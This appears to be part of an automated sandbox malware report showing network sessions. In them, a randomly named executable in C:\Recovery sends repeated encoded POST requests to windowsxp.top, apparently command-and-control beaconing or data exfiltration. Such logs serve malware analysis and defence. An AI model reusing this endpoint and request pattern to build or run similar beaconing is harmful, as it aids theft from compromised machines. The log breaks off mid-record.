                                                                                                                  Data Ascii: PR]\^XSTTXWTTR[^YP[[RSRYT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'X&=,"&#%<:,$8W/<T=,4U7#/'_>*^,?!Y##X(
                                                                                                                  Oct 27, 2024 19:23:47.316524982 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:47.515790939 CET767INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:47 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HiuZqWx89LOoX5GQxUTFH4RpW4KIcfG2nSvn6eGqn2eLBeRyl7kiG4Hz80eNcaBVnDZbAlVBWCgsAvUjSFrt8IEh%2BZ1bIJ%2FBkcds4aVz1Z7hmFb5P8s8%2F81xlys5pAoI"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b82059c96b4d-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1157&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1216806&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a
                                                                                                                  Data Ascii: 41R[P
                                                                                                                  Oct 27, 2024 19:23:47.516052961 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  72192.168.2.450068188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:47.673482895 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:48.024363995 CET1012OUTData Raw: 50 52 5d 5b 5e 53 56 53 54 58 57 54 54 5c 5b 59 59 5c 5b 50 52 54 52 52 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PR][^SVSTXWTT\[YY\[PRTRRT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'1>'"\%\"5#9'+;=?> P !8,[#)Z=9!Y##X(
                                                                                                                  Oct 27, 2024 19:23:48.276401997 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:48.475914001 CET768INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:48 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RooMJiwpKOmq1knFzCrpuaAOEJ9lk4Av0Ca6bxshnyLlx63G7Vsg1PsQO08U5UKA5e%2FU7kr5w7DkPTR621WDj4sJT6EAxWKIdgiRy381TtcTWZtyEYq1Jo3XWtyrynCe"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b82659500c0b-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1316&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1113846&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  73192.168.2.450075188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:48.699973106 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1008
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:49.055764914 CET1008OUTData Raw: 55 53 58 5f 5e 59 53 57 54 58 57 54 54 55 5b 52 59 58 5b 5c 52 52 52 52 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: USX_^YSWTXWTTU[RYX[\RRRRT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'['."*9!P$9/%(7,='*<7^-=7Z*5:?!Y##X(
                                                                                                                  Oct 27, 2024 19:23:49.295866966 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:49.495891094 CET765INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:49 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u9ikecbn8IAETmdtlvX0FfMWUr58XJQBgvSYrGt2DOvh3dAJGs2QtmB00O%2FJHur9c3bl4WsXTddW4KewvA1cwRWgGRLd51Mu1XoaESM6%2FH2B33sn9bKboW9eTdC80mCR"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b82cbee9e781-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1428&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1329&delivery_rate=1130366&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a
                                                                                                                  Data Ascii: 41R[P
                                                                                                                  Oct 27, 2024 19:23:49.495975971 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  74192.168.2.450080188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:49.633213043 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:49.986319065 CET1012OUTData Raw: 50 52 58 58 5b 5f 56 52 54 58 57 54 54 50 5b 5e 59 50 5b 5f 52 54 52 5d 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PRXX[_VRTXWTTP[^YP[_RTR]T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'Z1=/69%"P4Z:B<\08V;();#2,X??)9!Y##X(7
                                                                                                                  Oct 27, 2024 19:23:50.245431900 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:50.445421934 CET776INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:50 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bu3xCdUMHMxs4zMHUF2Lp2P22SmCLKyWl%2Bazej0Yn%2F4aOxzTuI8auUuKl8YOgSTndzYtcnGG7ybPRDjhS6T%2BTCpvykbO%2FpFsXHbV2bGU5m3%2BMFOIYf2HeItRVrbvuEJF"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b832aefe2c8b-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1407&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1056163&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  75192.168.2.450086188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:50.331048012 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1716
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:50.680624962 CET1716OUTData Raw: 50 51 58 59 5b 5b 56 54 54 58 57 54 54 51 5b 59 59 51 5b 5a 52 55 52 5e 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PQXY[[VTTXWTTQ[YYQ[ZRUR^T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'% [ )%^!^9Y$4, U*?771$8-??",?!Y##X(3
                                                                                                                  Oct 27, 2024 19:23:50.928251028 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:51.123960018 CET922INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:51 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S7iWoLEsVkWnASbfIdRoCN5j4kmyRJAkBuJO%2BR8xoN7t9UkQWA3T32krhU8xnQ7%2B7ublowVMrpJaFd1niUnf1brd4j6N9%2Fp%2BZF5sf20YMVS2JDFDbDlZfk8ZA8KKiTbW"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b836ea388d2d-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1880&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2037&delivery_rate=982360&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1a 22 5e 34 58 2c 55 29 12 2d 56 3e 31 0c 02 33 02 0f 5d 2f 0c 20 12 3d 2d 3d 1c 2e 06 07 0f 24 42 2a 18 3c 39 2c 5a 23 2d 34 52 29 1f 21 5e 00 1c 27 5c 20 3d 3a 08 31 3b 0e 5e 27 56 23 07 35 03 1e 00 2a 07 3a 0f 3c 29 3c 13 28 38 2b 50 2d 2f 3e 09 31 3a 26 11 3b 16 26 10 2b 00 2a 54 0c 14 22 00 3a 11 20 11 22 32 26 0a 2a 21 27 00 30 00 02 56 27 03 30 55 2b 2f 2b 5f 3c 2e 26 05 22 02 38 58 3c 38 3e 17 27 2d 02 00 2a 04 22 54 22 0e 29 53 0f 30 59 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"^4X,U)-V>13]/ =-=.$B*<9,Z#-4R)!^'\ =:1;^'V#5*:<)<(8+P-/>1:&;&+*T": "2&*!'0V'0U+/+_<.&"8X<8>'-*"T")S0YP0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  76192.168.2.450087188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:50.614419937 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:50.961886883 CET1012OUTData Raw: 55 55 58 59 5e 53 53 50 54 58 57 54 54 54 5b 5b 59 50 5b 50 52 57 52 53 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UUXY^SSPTXWTTT[[YP[PRWRST\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'2= _6:9#&-'+3;+8S(/P T</.()):!Y##X('
                                                                                                                  Oct 27, 2024 19:23:51.242623091 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:51.434400082 CET771INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:51 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V821wQS4RcyZ0kd8AQT6MaK9FU3VbXFO1w03HpPPQg8oKVzqGeu3DGmk4tMeJoqBeh%2BhQsA7CpqotZ5%2F1zTDlr%2BLRPyaTiSlveWjMvWvTp8YPf0Q9p0POkDvleilpR3T"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b838ea15466c-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1781&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=836027&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  77192.168.2.450090188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:52.415956974 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:52.774441004 CET1012OUTData Raw: 55 57 5d 59 5e 5f 56 57 54 58 57 54 54 53 5b 52 59 5f 5b 5b 52 54 52 5a 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UW]Y^_VWTXWTTS[RY_[[RTRZT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'%>,[":!Y#57.4#%(Q-='*<"!?[,>+*>.!Y##X(;
                                                                                                                  Oct 27, 2024 19:23:53.023951054 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:53.228291988 CET775INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:53 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KktnIFEqxNa%2Bro5r%2BxJlJrylt1V0cs0jIImdDaxkSSQcA338OmBUn9oQ9NGHP4nD7P4BMyyZBuKORo3ePZqSxoXat0rGcLZ%2BPqG75JB45TTriQp%2FG%2BgKVkfACSv7H0yD"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b84409d4e9b5-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1564&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=925239&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  78192.168.2.450091188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:53.354190111 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1008
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:53.711872101 CET1008OUTData Raw: 55 56 58 5d 5e 5c 53 50 54 58 57 54 54 55 5b 5e 59 5a 5b 5f 52 55 52 5d 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UVX]^\SPTXWTTU[^YZ[_RUR]T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$1X/5&58]-X%(/=$S)/;#"'/><>*^.?!Y##X(3
                                                                                                                  Oct 27, 2024 19:23:53.977998018 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:54.267026901 CET772INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:54 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TCxa9F6nHQYDvHBLC2OYNfOKoW71K341q6psVOt3C52wDjvT3HDxQWR7TMNts0lfs6P2xzSKk%2F3tyg%2FxeFYfe0YOoqBPdOqmdf8Qy7NNJxYzBUx7n3oZ0AUUF9j0nr%2FD"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b849cdf94768-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1066&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1329&delivery_rate=1377735&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  79192.168.2.450092188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:54.433525085 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:54.853442907 CET1012OUTData Raw: 55 50 58 5e 5b 58 53 54 54 58 57 54 54 50 5b 53 59 58 5b 50 52 54 52 5b 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UPX^[XSTTXWTTP[SYX[PRTR[T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$20_55"5(9$'(8-$U*,+#2$8.7Y)9:!Y##X(7
                                                                                                                  Oct 27, 2024 19:23:55.243628025 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:55.243840933 CET779INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:55 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SIxtT7pO%2FQJ6v7RTm%2BmsZFsskuEAGwq56tC2IYXa1Y6MYNztCPbNitf%2FTpEiLyVxMZJ4rLAQWB8PYJO531eBpjZ%2BOdFBst9PjCj8TTFr712Ifnv5DA%2Bri5xCO%2F6%2BiwmF"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8508dbc0bdd-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2160&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=678537&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  80192.168.2.450093188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:55.472805977 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:55.821430922 CET1012OUTData Raw: 55 54 58 5a 5b 58 56 57 54 58 57 54 54 54 5b 5c 59 5c 5b 50 52 50 52 59 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
